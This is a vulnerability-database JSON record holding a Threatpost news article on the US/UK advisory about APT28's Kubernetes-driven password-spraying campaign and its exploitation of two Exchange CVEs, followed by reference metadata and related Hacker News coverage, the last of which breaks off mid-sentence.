DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:B25070E6CF075EEA6B20C4D8D25ADBE8", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Kubernetes Used in Brute-Force Attacks Tied to Russia\u2019s APT28", "description": "U.S. and U.K. authorities are warning that the APT28 advanced-threat actor (APT) \u2013 a.k.a. Fancy Bear or Strontium, among other names \u2013 has been using a [Kubernetes](<https://threatpost.com/windows-containers-malware-targets-kubernetes/166692/>) cluster in a widespread campaign of brute-force password-spraying attacks against hundreds of government and private sector targets worldwide.\n\nThe joint alert ([PDF](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)) \u2013 posted on Thursday by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the U.K.\u2019s National Cyber Security Centre (NCSC) \u2013 attributes the campaign to the APT group, which has [long been suspected](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) of having ties to the General Staff Main Intelligence Directorate (GRU) arm of Russia\u2019s military intelligence.\n\nThe attacks have been launched since at least mid-2019 through early 2021 and are \u201calmost certainly still ongoing,\u201d according to the advisory.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe threat actor has targeted \u201ca significant amount\u201d of its activity at organizations using [Microsoft Office 365 cloud services](<https://threatpost.com/microsoft-office-365-attacks-google-firebase/163666/>), authorities warned.\n\nThe attackers are after the passwords of people who work at sensitive jobs in hundreds of organizations worldwide, including government and military agencies in the U.S. and Europe, defense contractors, think tanks, law firms, media outlets, universities and more.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/02101634/APT28-targets-e1625235408497.jpg>)\n\nAPT28 targets being bombarded by brute-force attacks. Source: CISA advisory.\n\nOnce the threat actors get valid credentials, they\u2019re using them for initial access, persistence, privilege escalation and defense evasion, among other things. The actors are using the passwords in conjunction with exploits of publicly known vulnerabilities, such as ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) \u2013 a vulnerability in the [control panel of Microsoft\u2019s Exchange Server](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) \u2013 and [ CVE 2020-17144](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17144>), also found in Exchange Server. Both these and other vulnerabilities can be used for remote code execution (RCE) and further access to target networks.\n\nAfter APT28 gains remote access, it uses a slew of well-known tactics, techniques and procedures (TTPs) \u2013 including HTTP(S), IMAP(S), POP3, and [NTLM](<https://threatpost.com/microsoft-addresses-ntlm-bugs-that-facilitate-credential-relay-attacks/126752/>) (a suite of Microsoft security protocols used for authentication \u2013 in addition to Kubernetes-powered password-spraying in order to gain lateral movement, to evade defenses and to sniff out more information from the target networks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/02103812/TTPs--e1625236705468.jpg>)\n\nExample of several TTPs used together as part of this type of brute-force campaign. Source: CISA advisory.\n\nGiven how vastly different the target networks\u2019 structures are, the actors are using an equally diverse mix of TTPs. The alert included 21 samples of known TTPs. One example is the TTPs used to exploit public-facing apps: APT28 has been tracked using the two previously mentioned bugs to gain privileged RCE on vulnerable Microsoft Exchange servers, which in some case happened after valid credentials were identified via password spray, given that exploitation of the vulnerabilities requires authentication as a valid user.\n\n## How Kubernetes Fits In\n\nAuthorities said that to obfuscate its true origin and to provide \u201ca degree of anonymity,\u201d the Kubernetes cluster used in these attacks normally routes brute-force authentication attempts through Tor and commercial [VPN services](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>), including CactusVPN, IPVanish, NordVPN, ProtonVPN, Surfshark and WorldVPN. If they\u2019re not using [Tor](<https://threatpost.com/unencrypted-mobile-traffic-tor-network-leaks-pii/149200/>) or a VPN, the actors are sometimes using nodes in the Kubernetes cluster.\n\nGiven the \u201cscalable nature of the password spray-capability,\u201d specific indicators of compromise (IOC) can be easily altered to bypass IOC-based mitigation, the advisory explained. Thus, while the advisory lists specific indicators, authorities also advised organizations to consider denying all inbound traffic from known Tor nodes and public VPN services to Exchange servers or portals that don\u2019t normally see that kind of access.\n\n## Mitigations\n\nBeyond authorities\u2019 suggestion to consider shutting off the spigot on Tor and VPN services where that makes sense, the advisory also listed a number of standard and not-so-standard mitigations, summed up in an executive summary:\n\n\u201cNetwork managers should adopt and expand usage of multi-factor authentication to help counter the effectiveness of this capability. Additional mitigations to ensure strong access controls include time-out and lock-out features, the mandatory use of strong passwords, implementation of a Zero Trust security model that uses additional attributes when determining access, and analytics to detect anomalous accesses.\u201d\n\nBut one expert \u2013 Tom (TJ) Jermoluk, CEO and co-founder of Beyond Identity, raised a hairy eyeball at the notion that stronger passwords can do anything to protect against password spraying, particularly when it comes on top of a concerted effort to gather valid credentials.\n\n\u201cRussian GRU agents and other state actors like those involved in SolarWinds \u2013 and a range of financially motivated attackers (e.g., ransomware) \u2013 all use the same \u2018password spraying\u2019 brute force techniques,\u201d he told Threatpost in an email on Friday. \u201cWhy? Because they are so effective. Unfortunately, a misunderstanding of this technique is leading to shockingly flawed advice like that given in the NSA advisory which, in part, recommends \u2018mandating the use of stronger passwords.'\u201d\n\nHe added, \u201cThe credential-gathering that preceded the password spraying campaign most certainly collected short and strong passwords. And the Russian Kubernetes cluster used in the attack was capable of spraying \u2018strong passwords.'\u201d\n\n## The Continuing Threat\n\nOn Friday, Russia\u2019s embassy in Washington issued a statement on [Facebook](<https://www.facebook.com/RusEmbUSA>) in which it \u201ccategorically\u201d rejected the allegations, noting that \u201cWe emphasize that fighting against cybercrime is an inherent priority for Russia and an integral part of its state policy to combat all forms of crime.\u201d\n\nJust a few of the recent campaigns attributed to Russia\u2019s military unit:\n\n**April 2021**: The [NSA linked APT29 ](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>)to Russia\u2019s Foreign Intelligence Services (SVR), as the U.S. formally attributed the recent [SolarWinds supply-chain attacks](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n**November 2020: **Microsoft reported that APT28 joined in the feeding frenzy as one of three major APTs that [went after pharma](<https://threatpost.com/russia-north-korea-attacking-covid-19-vaccine-makers/161205/>) and clinical organizations involved in COVID-19 research.\n\n**September 2020**: Microsoft issued a warning that members of the Russian military unit were attempting to [harvest Office 365](<https://threatpost.com/apt28-theft-office365-logins/159195/>) credentials in the runup to U.S. elections, targeting mainly election-related organizations. The company noted at the time that the group had attacked more than 200 organizations last year, including political campaigns, advocacy groups, parties and political consultants. Those targets included think-tanks such as The German Marshall Fund of the United States, The European People\u2019s Party, and various U.S.-based consultants serving Republicans and Democrats.\n\nSaying that we can\u2019t let down our guards would be quite the understatement, according to Check Point spokesperson Ekram Ahmed: \u201cGRU continues to be a threat that we can\u2019t ignore,\u201d he observed to Threatpost on Friday. \u201cThe scale, reach and pace of their operations are alarming, especially with the 2021 Summer Olympics around the corner.\u201d\n\nIn fact, in October 2020, the U.K.\u2019s NCSC, in a joint operation with U.S. intelligence, said that that\u2019s exactly what was in the works, accusing Russian military intelligence services of [planning a cyberattack](<https://www.theguardian.com/world/2020/oct/19/russia-planned-cyber-attack-on-tokyo-olympics-says-uk>) on the [Japanese-hosted Olympics](<https://www.sportingnews.com/au/other-sports/news/tokyo-olympic-games-2021-will-they-go-ahead/1gv928rhuuo0o1ucb6481onp4m>), scheduled to start in three weeks on July 23 after having been postponed due to the pandemic.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "published": "2021-07-02T16:14:14", "modified": "2021-07-02T16:14:14", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/kubernetes-brute-force-attacks-russia-apt28/167518/", "reporter": "Lisa Vaas", "references": ["https://threatpost.com/windows-containers-malware-targets-kubernetes/166692/", "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF", "https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/", "https://threatpost.com/newsletter-sign/", "https://threatpost.com/microsoft-office-365-attacks-google-firebase/163666/", "https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/02101634/APT28-targets-e1625235408497.jpg", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688", "https://threatpost.com/microsoft-exchange-exploited-flaw/159669/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17144", "https://threatpost.com/microsoft-addresses-ntlm-bugs-that-facilitate-credential-relay-attacks/126752/", "https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/02103812/TTPs--e1625236705468.jpg", "https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/", "https://threatpost.com/unencrypted-mobile-traffic-tor-network-leaks-pii/149200/", "https://www.facebook.com/RusEmbUSA", "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/", "https://threatpost.com/russia-north-korea-attacking-covid-19-vaccine-makers/161205/", "https://threatpost.com/apt28-theft-office365-logins/159195/", "https://www.theguardian.com/world/2020/oct/19/russia-planned-cyber-attack-on-tokyo-olympics-says-uk", "https://www.sportingnews.com/au/other-sports/news/tokyo-olympic-games-2021-will-they-go-ahead/1gv928rhuuo0o1ucb6481onp4m", "https://threatpost.com/category/webinars/"], "cvelist": ["CVE-2020-0688", "CVE-2020-17144"], "immutableFields": [], "lastseen": "2021-07-07T11:01:50", "viewCount": 330, "enchantments": {"dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441"]}, {"type": "attackerkb", "idList": ["AKB:3B7AE30E-7135-4027-A5DA-A88A045903F6", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491"]}, {"type": "canvas", "idList": ["OWA_RCE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0104", "CPAI-2020-1252"]}, {"type": "cisa", "idList": ["CISA:18E5825084F7681AD375ACB5B1270280"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2020-0688", "CISA-KEV-CVE-2020-17144"]}, {"type": "cve", "idList": ["CVE-2020-0688", "CVE-2020-17117", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"]}, {"type": "exploitdb", "idList": ["EDB-ID:48153", "EDB-ID:48168"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05"]}, {"type": "githubexploit", "idList": ["39732E15-7AF0-5FC2-851B-B63466C0F2F2", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "8C937DCD-4090-5A44-9361-4D9ECF545843", "A1463971-12CC-5B11-99E8-018B541F4F71", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "AAC2853C-A655-5E80-9262-A654102B874A", "AC621762-B940-53F9-B9DB-34B015F55B87", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "F1CA855B-967C-5A5E-9256-FDDE87702713"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hivepro", "idList": ["HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "ics", "idList": ["AA20-258A", "AA20-275A", "AA20-296A", "AA21-209A", "AA22-011A", "AA22-047A", "AA22-055A", "AA22-117A"]}, {"type": "kaspersky", "idList": ["KLA11664", "KLA12022"]}, {"type": "krebs", "idList": ["KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_ECP_VIEWSTATE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0688", "MS:CVE-2020-17117", "MS:CVE-2020-17132", "MS:CVE-2020-17141", "MS:CVE-2020-17142", "MS:CVE-2020-17144", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065"]}, {"type": "mskb", "idList": ["KB4536987", "KB4536988", "KB4536989", "KB4593467"]}, {"type": "mssecure", "idList": ["MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["701277.PRM", "SMB_NT_MS20_DEC_EXCHANGE_2010.NASL", "SMB_NT_MS20_FEB_EXCHANGE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156592", "PACKETSTORM:156620", "PACKETSTORM:158056"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D6BB8795D96ECAD5C95596F19210BB13", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080", "RAPID7BLOG:CBD7A5DA1DAAE9DCFD01F104F4B1B5FB", "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85"]}, {"type": "securelist", "idList": ["SECURELIST:67C82A057DBE22C60DC2677D52D52ECD", "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:F05591B26EFD622E6C72E180A7A47154"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:8D0E2C792A85A3FB8EC6A823D487FAE6", "THN:9B536B531E6948881A29BEC793495D1E", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:CE51F3F4A94EFC268FD06200BF55BECD"]}, {"type": "threatpost", "idList": ["THREATPOST:06C5D9E6950186757AA989F2557336B3", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:24AD38597408C4E7757770D45345AEBA", "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4D0DF8055D2BC682608C1A746606A6E4", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:6EA5AB7FCD767A01EA56D7EEF6DA0B0A", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20"]}, {"type": "zdi", "idList": ["ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34553"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441"]}, {"type": "attackerkb", "idList": ["AKB:3B7AE30E-7135-4027-A5DA-A88A045903F6", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "avleonov", "idList": ["AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491"]}, {"type": "canvas", "idList": ["OWA_RCE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0104", "CPAI-2020-1252"]}, {"type": "cisa", "idList": ["CISA:18E5825084F7681AD375ACB5B1270280"]}, {"type": "cve", "idList": ["CVE-2020-0688", "CVE-2020-17144"]}, {"type": "exploitdb", "idList": ["EDB-ID:48153", "EDB-ID:48168"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05"]}, {"type": "githubexploit", "idList": ["39732E15-7AF0-5FC2-851B-B63466C0F2F2", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "8C937DCD-4090-5A44-9361-4D9ECF545843", "A1463971-12CC-5B11-99E8-018B541F4F71", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "AAC2853C-A655-5E80-9262-A654102B874A", "AC621762-B940-53F9-B9DB-34B015F55B87", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "F1CA855B-967C-5A5E-9256-FDDE87702713"]}, {"type": "hivepro", "idList": ["HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "kaspersky", "idList": ["KLA11664"]}, {"type": "krebs", "idList": ["KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_ECP_VIEWSTATE"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0688", "MS:CVE-2020-17144"]}, {"type": "mskb", "idList": ["KB4536989"]}, {"type": "mssecure", "idList": ["MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_DEC_EXCHANGE_2010.NASL", "SMB_NT_MS20_FEB_EXCHANGE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156592", "PACKETSTORM:156620", "PACKETSTORM:158056"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0", "QUALYSBLOG:D6BB8795D96ECAD5C95596F19210BB13"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080", "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F54F8338674294DE3D323ED03140CB71"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20"]}, {"type": "zdi", "idList": ["ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-34037", "1337DAY-ID-34051"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-0688", "epss": "0.974270000", "percentile": "0.998750000", "modified": "2023-03-17"}, {"cve": "CVE-2020-17144", "epss": "0.280130000", "percentile": "0.961000000", "modified": "2023-03-17"}], "vulnersScore": 0.5}, "_state": {"dependencies": 1678920471, "score": 1678921101, "epss": 1679098904}, "_internal": {"score_hash": "a4edfe161258195be6a9f282bc0e6967"}}

{"thn": [{"lastseen": "2022-05-09T12:39:23", "description": "[](<https://thehackernews.com/images/--04MOd8YdVg/YN6wbhVl-jI/AAAAAAAADD0/1Sag5ybubFo60Vyq--khtAQnmmKIjcy5ACLcBGAsYHQ/s0/russian-hacking.jpg>)\n\nAn ongoing brute-force attack campaign targeting enterprise cloud environments has been spearheaded by the Russian military intelligence since mid-2019, according to a joint advisory published by intelligence agencies in the U.K. and U.S.\n\nThe National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and the U.K.'s National Cyber Security Centre (NCSC) formally attributed the incursions to the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).\n\nThe [threat actor](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) is also tracked under various monikers, including [APT28](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt28.html>) (FireEye Mandiant), [Fancy Bear](<https://www.crowdstrike.com/blog/who-is-fancy-bear/>) (CrowdStrike), [Sofacy](<https://www.kaspersky.com/about/press-releases/2018_sofacy>) (Kaspersky), [STRONTIUM](<https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/>) (Microsoft), and [Iron Twilight](<https://www.secureworks.com/research/threat-profiles/iron-twilight>) (Secureworks).\n\nAPT28 has a track record of leveraging password spray and brute-force login attempts to plunder valid credentials that enable future surveillance or intrusion operations. In November 2020, Microsoft [disclosed](<https://blogs.microsoft.com/on-the-issues/2020/11/13/health-care-cyberattacks-covid-19-paris-peace-forum/>) credential harvesting activities staged by the adversary aimed at companies involved in researching vaccines and treatments for COVID-19.\n\nWhat's different this time around is the actor's reliance on software containers to scale its brute-force attacks.\n\n\"The campaign uses a Kubernetes cluster in brute force access attempts against the enterprise and cloud environments of government and private sector targets worldwide,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/01/nsa-cisa-ncsc-fbi-joint-cybersecurity-advisory-russian-gru-brute>). \"After obtaining credentials via brute force, the GTsSS uses a variety of known vulnerabilities for further network access via remote code execution and lateral movement.\"\n\nSome of the other security flaws exploited by APT28 to pivot inside the breached organizations and gain access to internal email servers include -\n\n * [**CVE-2020-0688**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0688>) \\- Microsoft Exchange Validation Key Remote Code Execution Vulnerability\n * [**CVE-2020-17144**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17144>) \\- Microsoft Exchange Remote Code Execution Vulnerability\n\nThe threat actor is also said to have utilized different evasion techniques in an attempt to disguise some components of their operations, including routing brute-force authentication attempts through Tor and commercial VPN services, such as CactusVPN, IPVanish, NordVPN, ProtonVPN, Surfshark, and WorldVPN.\n\nThe agencies said the attacks primarily focused on the U.S. and Europe, targeting government and military, defense contractors, energy companies, higher education, logistics companies, law firms, media companies, political consultants or political parties, and think tanks.\n\n\"Network managers should adopt and expand usage of multi-factor authentication to help counter the effectiveness of this capability,\" the advisory [noted](<https://www.nsa.gov/news-features/press-room/Article/2677750/nsa-partners-release-cybersecurity-advisory-on-brute-force-global-cyber-campaign/>). \"Additional mitigations to ensure strong access controls include time-out and lock-out features, the mandatory use of strong passwords, implementation of a Zero Trust security model that uses additional attributes when determining access, and analytics to detect anomalous accesses.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T06:23:00", "type": "thn", "title": "NSA, FBI Reveal Hacking Methods Used by Russian Military Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-17144"], "modified": "2021-07-03T14:44:51", "id": "THN:8D0E2C792A85A3FB8EC6A823D487FAE6", "href": "https://thehackernews.com/2021/07/nsa-fbi-reveal-hacking-methods-used-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:33", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgfHxH3Dt4VXRfmdH7Z5AIzdTH11h4caDd4ap4XoxMEluunQIHIKcMfsOmGXHYfBm80iV7yauBv6comuqDI53yYZ-scRdempbDZFRKoVre0dwv8XB-HY7OuqI3zugrjX_AU4O94F-ikvT5ttBGEc9cGB3wRTB1Tkpo2jFZZ5dobK0ftUAK2GlxVr_sa>)\n\nState-sponsored actors backed by the Russian government regularly targeted the networks of several U.S. cleared defense contractors (CDCs) to acquire proprietary documents and other confidential information pertaining to the country's defense and intelligence programs and capabilities.\n\nThe sustained espionage campaign is said to have commenced at least two years ago from January 2020, according to a [joint advisory](<https://www.cisa.gov/news/2022/02/16/new-cybersecurity-advisory-protecting-cleared-defense-contractor-networks-against>) published by the U.S. Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA).\n\n\"These continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>). \"The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology.\"\n\nCompromised entities include contractors that dabble in command, control, communications, and combat systems; surveillance and reconnaissance; weapons and missile development; vehicle and aircraft design; and software development, data analytics, and logistics.\n\nThe threat actors rely on \"common but effective\" tactics to breach target networks such as spear-phishing, credential harvesting, brute-force attacks, password spray techniques, and exploitation of known vulnerabilities in VPN devices, before moving laterally to establish persistence and exfiltrate 